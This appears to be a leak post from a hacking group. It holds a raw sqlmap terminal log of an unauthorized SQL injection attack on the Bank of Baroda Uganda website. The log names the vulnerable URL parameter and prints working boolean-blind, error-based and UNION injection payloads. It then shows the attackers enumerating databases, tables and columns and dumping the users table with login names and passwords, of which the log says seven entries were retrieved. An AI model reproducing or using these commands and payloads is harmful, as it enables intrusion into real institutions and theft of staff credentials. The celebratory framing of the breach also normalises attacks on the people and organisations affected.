yukinoshita47

[LEAKED] Bank of Baroda Uganda Ltd

Jul 26th, 2017
  1. ########################################################
  2.  
  3. ____ _____ __ __
  4. / | / ___/ | | |
  5. | __| ( \_ | | |
  6. | | | \__ | | _ |
  7. | |_ | / \ | | | |
  8. | | \ | | | |
  9. |___,_| aruda \___| ecurity |__|__| acker
  10.  
  11. LEAKING SOMETHING FUCKING COOL
  12. *****
  13. Date Thursday 27 July 2017
  14.  
  15. Target BANK OF BARODA UGANDA
  16. by Yukinoshita 47
  17.  
  18.  
  19. ############################################################
  20.  
  21. Yukinoshita 47 - Cr4bbyP4tty - _Tuan2Fay_
  22.  
  23. E7B_404 - Lyonc - Fazlast - Mr. Viruzer#29
  24.  
  25. Engkus - Snooze - Sys47ID -
  26.  
  27. And All Member of Garuda Security Hacker
  28.  
  29. blog : http://blog.garudasecurityhacker.org
  30. FB : https://facebook.com/gshofficialpageindonesia
  31.  
  32. ############################################################
  33.  
  34.  
  35. root@yukinoshita47:~# sqlmap -u https://www.bankofbaroda.ug/newsdetails.php?detail=109 --dbs
  36.  
  37. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  38. http://sqlmap.org
  39.  
  40. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  41.  
  42. [*] starting at 06:33:01
  43.  
  44. [06:33:01] [INFO] resuming back-end DBMS 'mysql'
  45. [06:33:02] [INFO] testing connection to the target URL
  46. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  47. ---
  48. Place: GET
  49. Parameter: detail
  50. Type: boolean-based blind
  51. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  52. Payload: detail=-8074 OR (1732=1732)#
  53.  
  54. Type: error-based
  55. Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
  56. Payload: detail=109 AND EXTRACTVALUE(3077,CONCAT(0x5c,0x7162766f71,(SELECT (CASE WHEN (3077=3077) THEN 1 ELSE 0 END)),0x716b6d6171))
  57.  
  58. Type: UNION query
  59. Title: MySQL UNION query (NULL) - 6 columns
  60. Payload: detail=109 UNION ALL SELECT NULL,NULL,CONCAT(0x7162766f71,0x70514f6f51766f485351,0x716b6d6171),NULL,NULL,NULL#
  61. ---
  62. [06:33:05] [INFO] the back-end DBMS is MySQL
  63. web application technology: Apache, PHP 5.3.29
  64. back-end DBMS: MySQL 5.1
  65. [06:33:05] [INFO] fetching database names
  66. [06:33:08] [INFO] the SQL query used returns 3 entries
  67. [06:33:10] [INFO] retrieved: "information_schema"
  68. [06:33:13] [INFO] retrieved: "tampco_bobDb"
  69. [06:33:15] [INFO] retrieved: "tampco_webnet"
  70. available databases [3]:
  71. [*] information_schema
  72. [*] tampco_bobDb
  73. [*] tampco_webnet
  74.  
  75. [06:33:15] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.bankofbaroda.ug'
  76.  
  77. [*] shutting down at 06:33:15
  78.  
  79. root@yukinoshita47:~# ^C
  80. root@yukinoshita47:~# clear
  81.  
  82. root@yukinoshita47:~# sqlmap -u https://www.bankofbaroda.ug/newsdetails.php?detail=109 --dbs
  83.  
  84. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  85. http://sqlmap.org
  86.  
  87. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  88.  
  89. [*] starting at 06:34:14
  90.  
  91. [06:34:15] [INFO] resuming back-end DBMS 'mysql'
  92. [06:34:15] [INFO] testing connection to the target URL
  93. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  94. ---
  95. Place: GET
  96. Parameter: detail
  97. Type: boolean-based blind
  98. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  99. Payload: detail=-8074 OR (1732=1732)#
  100.  
  101. Type: error-based
  102. Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
  103. Payload: detail=109 AND EXTRACTVALUE(3077,CONCAT(0x5c,0x7162766f71,(SELECT (CASE WHEN (3077=3077) THEN 1 ELSE 0 END)),0x716b6d6171))
  104.  
  105. Type: UNION query
  106. Title: MySQL UNION query (NULL) - 6 columns
  107. Payload: detail=109 UNION ALL SELECT NULL,NULL,CONCAT(0x7162766f71,0x70514f6f51766f485351,0x716b6d6171),NULL,NULL,NULL#
  108. ---
  109. [06:34:18] [INFO] the back-end DBMS is MySQL
  110. web application technology: Apache, PHP 5.3.29
  111. back-end DBMS: MySQL 5.1
  112. [06:34:18] [INFO] fetching database names
  113. [06:34:18] [INFO] the SQL query used returns 3 entries
  114. [06:34:18] [INFO] resumed: "information_schema"
  115. [06:34:18] [INFO] resumed: "tampco_bobDb"
  116. [06:34:18] [INFO] resumed: "tampco_webnet"
  117. available databases [3]:
  118. [*] information_schema
  119. [*] tampco_bobDb
  120. [*] tampco_webnet
  121.  
  122. [06:34:18] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.bankofbaroda.ug'
  123.  
  124. [*] shutting down at 06:34:18
  125.  
  126. root@yukinoshita47:~# sqlmap -u https://www.bankofbaroda.ug/newsdetails.php?detail=109 -D tampco_webnet --tables
  127. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  128. http://sqlmap.org
  129.  
  130. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  131.  
  132. [*] starting at 06:35:16
  133.  
  134. [06:35:16] [INFO] resuming back-end DBMS 'mysql'
  135. [06:35:16] [INFO] testing connection to the target URL
  136. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  137. ---
  138. Place: GET
  139. Parameter: detail
  140. Type: boolean-based blind
  141. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  142. Payload: detail=-8074 OR (1732=1732)#
  143.  
  144. Type: error-based
  145. Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
  146. Payload: detail=109 AND EXTRACTVALUE(3077,CONCAT(0x5c,0x7162766f71,(SELECT (CASE WHEN (3077=3077) THEN 1 ELSE 0 END)),0x716b6d6171))
  147.  
  148. Type: UNION query
  149. Title: MySQL UNION query (NULL) - 6 columns
  150. Payload: detail=109 UNION ALL SELECT NULL,NULL,CONCAT(0x7162766f71,0x70514f6f51766f485351,0x716b6d6171),NULL,NULL,NULL#
  151. ---
  152. [06:35:20] [INFO] the back-end DBMS is MySQL
  153. web application technology: Apache, PHP 5.3.29
  154. back-end DBMS: MySQL 5.1
  155. [06:35:20] [INFO] fetching tables for database: 'tampco_webnet'
  156. [06:35:23] [INFO] the SQL query used returns 11 entries
  157. [06:35:25] [INFO] retrieved: "annual_report"
  158. [06:35:27] [INFO] retrieved: "app_category"
  159. [06:35:29] [INFO] retrieved: "application_form"
  160. [06:35:31] [INFO] retrieved: "currency_category"
  161. [06:35:33] [INFO] retrieved: "exchange_rate"
  162. [06:35:35] [INFO] retrieved: "new_event"
  163. [06:35:36] [INFO] retrieved: "photo_category"
  164. [06:35:38] [INFO] retrieved: "photo_gallary"
  165. [06:35:41] [INFO] retrieved: "rpt_category"
  166. [06:35:43] [INFO] retrieved: "share_price"
  167. [06:35:45] [INFO] retrieved: "users"
  168. Database: tampco_webnet
  169. [11 tables]
  170. +-------------------+
  171. | annual_report |
  172. | app_category |
  173. | application_form |
  174. | currency_category |
  175. | exchange_rate |
  176. | new_event |
  177. | photo_category |
  178. | photo_gallary |
  179. | rpt_category |
  180. | share_price |
  181. | users |
  182. +-------------------+
  183.  
  184. [06:35:45] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.bankofbaroda.ug'
  185.  
  186. [*] shutting down at 06:35:45
  187.  
  188. root@yukinoshita47:~# sqlmap -u https://www.bankofbaroda.ug/newsdetails.php?detail=109 -D tampco_webnet --columns
  189.  
  190. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  191. http://sqlmap.org
  192.  
  193. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  194.  
  195. [*] starting at 06:37:32
  196.  
  197. [06:37:32] [INFO] resuming back-end DBMS 'mysql'
  198. [06:37:32] [INFO] testing connection to the target URL
  199. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  200. ---
  201. Place: GET
  202. Parameter: detail
  203. Type: boolean-based blind
  204. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  205. Payload: detail=-8074 OR (1732=1732)#
  206.  
  207. Type: error-based
  208. Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
  209. Payload: detail=109 AND EXTRACTVALUE(3077,CONCAT(0x5c,0x7162766f71,(SELECT (CASE WHEN (3077=3077) THEN 1 ELSE 0 END)),0x716b6d6171))
  210.  
  211. Type: UNION query
  212. Title: MySQL UNION query (NULL) - 6 columns
  213. Payload: detail=109 UNION ALL SELECT NULL,NULL,CONCAT(0x7162766f71,0x70514f6f51766f485351,0x716b6d6171),NULL,NULL,NULL#
  214. ---
  215. [06:38:05] [INFO] the back-end DBMS is MySQL
  216. web application technology: Apache, PHP 5.3.29
  217. back-end DBMS: MySQL 5.1
  218. [06:38:05] [INFO] fetching tables for database: 'tampco_webnet'
  219. [06:38:06] [INFO] the SQL query used returns 11 entries
  220. [06:38:06] [INFO] resumed: "annual_report"
  221. [06:38:06] [INFO] resumed: "app_category"
  222. [06:38:06] [INFO] resumed: "application_form"
  223. [06:38:06] [INFO] resumed: "currency_category"
  224. [06:38:06] [INFO] resumed: "exchange_rate"
  225. [06:38:06] [INFO] resumed: "new_event"
  226. [06:38:06] [INFO] resumed: "photo_category"
  227. [06:38:06] [INFO] resumed: "photo_gallary"
  228. [06:38:06] [INFO] resumed: "rpt_category"
  229. [06:38:06] [INFO] resumed: "share_price"
  230. [06:38:06] [INFO] resumed: "users"
  231. [06:38:06] [INFO] fetching columns for table 'app_category' in database 'tampco_webnet'
  232. [06:38:08] [INFO] the SQL query used returns 2 entries
  233. [06:38:10] [INFO] retrieved: "app_cat_id","int(3)"
  234. [06:38:12] [INFO] retrieved: "app_category","varchar(30)"
  235. [06:38:13] [INFO] fetching columns for table 'photo_category' in database 'tampco_webnet'
  236. [06:38:15] [INFO] the SQL query used returns 2 entries
  237. [06:38:17] [INFO] retrieved: "cat_id","int(3)"
  238. [06:38:18] [INFO] retrieved: "pic_category","varchar(30)"
  239. [06:38:18] [INFO] fetching columns for table 'rpt_category' in database 'tampco_webnet'
  240. [06:38:20] [INFO] the SQL query used returns 2 entries
  241. [06:38:23] [INFO] retrieved: "rept_cat_id","int(3)"
  242. [06:38:25] [INFO] retrieved: "rpt_category","varchar(30)"
  243. [06:38:25] [INFO] fetching columns for table 'photo_gallary' in database 'tampco_webnet'
  244. [06:38:58] [INFO] the SQL query used returns 5 entries
  245. [06:39:00] [INFO] retrieved: "pic_id","int(3)"
  246. [06:39:02] [INFO] retrieved: "cat_id","int(3)"
  247. [06:39:05] [INFO] retrieved: "picture","varchar(200)"
  248. [06:39:07] [INFO] retrieved: "d_desc","text"
  249. [06:39:09] [INFO] retrieved: "date_taken","date"
  250. [06:39:09] [INFO] fetching columns for table 'annual_report' in database 'tampco_webnet'
  251. [06:39:11] [INFO] the SQL query used returns 5 entries
  252. [06:39:14] [INFO] retrieved: "rept_id","int(3)"
  253. [06:39:15] [INFO] retrieved: "rept_cat_id","int(3)"
  254. [06:39:17] [INFO] retrieved: "title","varchar(100)"
  255. [06:39:19] [INFO] retrieved: "report","varchar(200)"
  256. [06:39:21] [INFO] retrieved: "rept_date","date"
  257. [06:39:21] [INFO] fetching columns for table 'currency_category' in database 'tampco_webnet'
  258. [06:39:24] [INFO] the SQL query used returns 2 entries
  259. [06:39:26] [INFO] retrieved: "currency_code","int(3)"
  260. [06:39:28] [INFO] retrieved: "currency_name","varchar(50)"
  261. [06:39:28] [INFO] fetching columns for table 'exchange_rate' in database 'tampco_webnet'
  262. [06:40:01] [INFO] the SQL query used returns 7 entries
  263. [06:40:03] [INFO] retrieved: "ex_rate_id","int(3)"
  264. [06:40:05] [INFO] retrieved: "currency_code","int(3)"
  265. [06:40:07] [INFO] retrieved: "ex_rate","float"
  266. [06:40:09] [INFO] retrieved: "selling_rate","float"
  267. [06:40:11] [INFO] retrieved: "ex_date","text"
  268. [06:40:13] [INFO] retrieved: "ex_time","text"
  269. [06:40:15] [INFO] retrieved: "date_time","timestamp"
  270. [06:40:15] [INFO] fetching columns for table 'new_event' in database 'tampco_webnet'
  271. [06:40:48] [INFO] the SQL query used returns 6 entries
  272. [06:40:50] [INFO] retrieved: "n_id","int(4)"
  273. [06:40:53] [INFO] retrieved: "avenue","varchar(100)"
  274. [06:40:55] [INFO] retrieved: "e_desc","text"
  275. [06:40:57] [INFO] retrieved: "e-link","text"
  276. [06:40:58] [INFO] retrieved: "event_date","text"
  277. [06:41:00] [INFO] retrieved: "archive","tinyint(1)"
  278. [06:41:00] [INFO] fetching columns for table 'share_price' in database 'tampco_webnet'
  279. [06:41:02] [INFO] the SQL query used returns 3 entries
  280. [06:41:05] [INFO] retrieved: "share_date","date"
  281. [06:41:07] [INFO] retrieved: "amount","float"
  282. [06:41:10] [INFO] retrieved: "share_time","timestamp"
  283. [06:41:10] [INFO] fetching columns for table 'application_form' in database 'tampco_webnet'
  284. [06:41:12] [INFO] the SQL query used returns 5 entries
  285. [06:41:45] [INFO] retrieved: "app_id","int(3)"
  286. [06:41:47] [INFO] retrieved: "app_cat_id","int(3)"
  287. [06:41:49] [INFO] retrieved: "title","varchar(100)"
  288. [06:41:51] [INFO] retrieved: "app_form","varchar(200)"
  289. [06:41:53] [INFO] retrieved: "form_date","date"
  290. [06:41:53] [INFO] fetching columns for table 'users' in database 'tampco_webnet'
  291. [06:41:55] [INFO] the SQL query used returns 10 entries
  292. [06:42:04] [INFO] retrieved: "userid","int(11)"
  293. [06:42:06] [INFO] retrieved: "loginname","varchar(255)"
  294. [06:42:08] [INFO] retrieved: "password","varchar(255)"
  295. [06:42:10] [INFO] retrieved: "temp_pass","varchar(55)"
  296. [06:42:12] [INFO] retrieved: "temp_pass_active","tinyint(1)"
  297. [06:42:14] [INFO] retrieved: "email","varchar(255)"
  298. [06:42:16] [INFO] retrieved: "fname","text"
  299. [06:42:18] [INFO] retrieved: "sname","text"
  300. [06:42:20] [INFO] retrieved: "page_access","text"
  301. [06:42:22] [INFO] retrieved: "Guid","varchar(32)"
  302. Database: tampco_webnet
  303. Table: app_category
  304. [2 columns]
  305. +--------------+-------------+
  306. | Column | Type |
  307. +--------------+-------------+
  308. | app_cat_id | int(3) |
  309. | app_category | varchar(30) |
  310. +--------------+-------------+
  311.  
  312. Database: tampco_webnet
  313. Table: photo_category
  314. [2 columns]
  315. +--------------+-------------+
  316. | Column | Type |
  317. +--------------+-------------+
  318. | cat_id | int(3) |
  319. | pic_category | varchar(30) |
  320. +--------------+-------------+
  321.  
  322. Database: tampco_webnet
  323. Table: rpt_category
  324. [2 columns]
  325. +--------------+-------------+
  326. | Column | Type |
  327. +--------------+-------------+
  328. | rept_cat_id | int(3) |
  329. | rpt_category | varchar(30) |
  330. +--------------+-------------+
  331.  
  332. Database: tampco_webnet
  333. Table: photo_gallary
  334. [5 columns]
  335. +------------+--------------+
  336. | Column | Type |
  337. +------------+--------------+
  338. | cat_id | int(3) |
  339. | d_desc | text |
  340. | date_taken | date |
  341. | pic_id | int(3) |
  342. | picture | varchar(200) |
  343. +------------+--------------+
  344.  
  345. Database: tampco_webnet
  346. Table: annual_report
  347. [5 columns]
  348. +-------------+--------------+
  349. | Column | Type |
  350. +-------------+--------------+
  351. | report | varchar(200) |
  352. | rept_cat_id | int(3) |
  353. | rept_date | date |
  354. | rept_id | int(3) |
  355. | title | varchar(100) |
  356. +-------------+--------------+
  357.  
  358. Database: tampco_webnet
  359. Table: currency_category
  360. [2 columns]
  361. +---------------+-------------+
  362. | Column | Type |
  363. +---------------+-------------+
  364. | currency_code | int(3) |
  365. | currency_name | varchar(50) |
  366. +---------------+-------------+
  367.  
  368. Database: tampco_webnet
  369. Table: exchange_rate
  370. [7 columns]
  371. +---------------+-----------+
  372. | Column | Type |
  373. +---------------+-----------+
  374. | currency_code | int(3) |
  375. | date_time | timestamp |
  376. | ex_date | text |
  377. | ex_rate | float |
  378. | ex_rate_id | int(3) |
  379. | ex_time | text |
  380. | selling_rate | float |
  381. +---------------+-----------+
  382.  
  383. Database: tampco_webnet
  384. Table: new_event
  385. [6 columns]
  386. +------------+--------------+
  387. | Column | Type |
  388. +------------+--------------+
  389. | e-link | text |
  390. | archive | tinyint(1) |
  391. | avenue | varchar(100) |
  392. | e_desc | text |
  393. | event_date | text |
  394. | n_id | int(4) |
  395. +------------+--------------+
  396.  
  397. Database: tampco_webnet
  398. Table: share_price
  399. [3 columns]
  400. +------------+-----------+
  401. | Column | Type |
  402. +------------+-----------+
  403. | amount | float |
  404. | share_date | date |
  405. | share_time | timestamp |
  406. +------------+-----------+
  407.  
  408. Database: tampco_webnet
  409. Table: application_form
  410. [5 columns]
  411. +------------+--------------+
  412. | Column | Type |
  413. +------------+--------------+
  414. | app_cat_id | int(3) |
  415. | app_form | varchar(200) |
  416. | app_id | int(3) |
  417. | form_date | date |
  418. | title | varchar(100) |
  419. +------------+--------------+
  420.  
  421. Database: tampco_webnet
  422. Table: users
  423. [10 columns]
  424. +------------------+--------------+
  425. | Column | Type |
  426. +------------------+--------------+
  427. | email | varchar(255) |
  428. | fname | text |
  429. | Guid | varchar(32) |
  430. | loginname | varchar(255) |
  431. | page_access | text |
  432. | password | varchar(255) |
  433. | sname | text |
  434. | temp_pass | varchar(55) |
  435. | temp_pass_active | tinyint(1) |
  436. | userid | int(11) |
  437. +------------------+--------------+
  438.  
  439. [06:42:22] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.bankofbaroda.ug'
  440.  
  441. [*] shutting down at 06:42:22
  442.  
  443. root@yukinoshita47:~# sqlmap -u https://www.bankofbaroda.ug/newsdetails.php?detail=109 -D tampco_webnet -T users -C email,fname,loginname,page_access,password,userid --dump
  444.  
  445. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  446. http://sqlmap.org
  447.  
  448. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  449.  
  450. [*] starting at 06:45:15
  451.  
  452. [06:45:16] [INFO] resuming back-end DBMS 'mysql'
  453. [06:45:16] [INFO] testing connection to the target URL
  454. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  455. ---
  456. Place: GET
  457. Parameter: detail
  458. Type: boolean-based blind
  459. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  460. Payload: detail=-8074 OR (1732=1732)#
  461.  
  462. Type: error-based
  463. Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
  464. Payload: detail=109 AND EXTRACTVALUE(3077,CONCAT(0x5c,0x7162766f71,(SELECT (CASE WHEN (3077=3077) THEN 1 ELSE 0 END)),0x716b6d6171))
  465.  
  466. Type: UNION query
  467. Title: MySQL UNION query (NULL) - 6 columns
  468. Payload: detail=109 UNION ALL SELECT NULL,NULL,CONCAT(0x7162766f71,0x70514f6f51766f485351,0x716b6d6171),NULL,NULL,NULL#
  469. ---
  470. [06:45:19] [INFO] the back-end DBMS is MySQL
  471. web application technology: Apache, PHP 5.3.29
  472. back-end DBMS: MySQL 5.1
  473. [06:45:19] [INFO] fetching columns 'email, fname, loginname, page_access, password, userid' for table 'users' in database 'tampco_webnet'
  474. [06:45:22] [INFO] the SQL query used returns 6 entries
  475. [06:45:24] [INFO] retrieved: "userid","int(11)"
  476. [06:45:26] [INFO] retrieved: "loginname","varchar(255)"
  477. [06:45:28] [INFO] retrieved: "password","varchar(255)"
  478. [06:45:30] [INFO] retrieved: "email","varchar(255)"
  479. [06:45:32] [INFO] retrieved: "fname","text"
  480. [06:45:35] [INFO] retrieved: "page_access","text"
  481. [06:45:35] [INFO] fetching entries of column(s) 'email, fname, loginname, page_access, password, userid' for table 'users' in database 'tampco_webnet'
  482. [06:45:37] [INFO] the SQL query used returns 7 entries
  490. [06:45:52] [INFO] analyzing table dump for possible password hashes
  491. Database: tampco_webnet
  492. Table: users
  493. [7 entries]
  505.  
  506. [06:45:52] [INFO] table 'tampco_webnet.users' dumped to CSV file '/usr/share/sqlmap/output/www.bankofbaroda.ug/dump/tampco_webnet/users.csv'
  507. [06:45:52] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.bankofbaroda.ug'
  508.  
  509. [*] shutting down at 06:45:52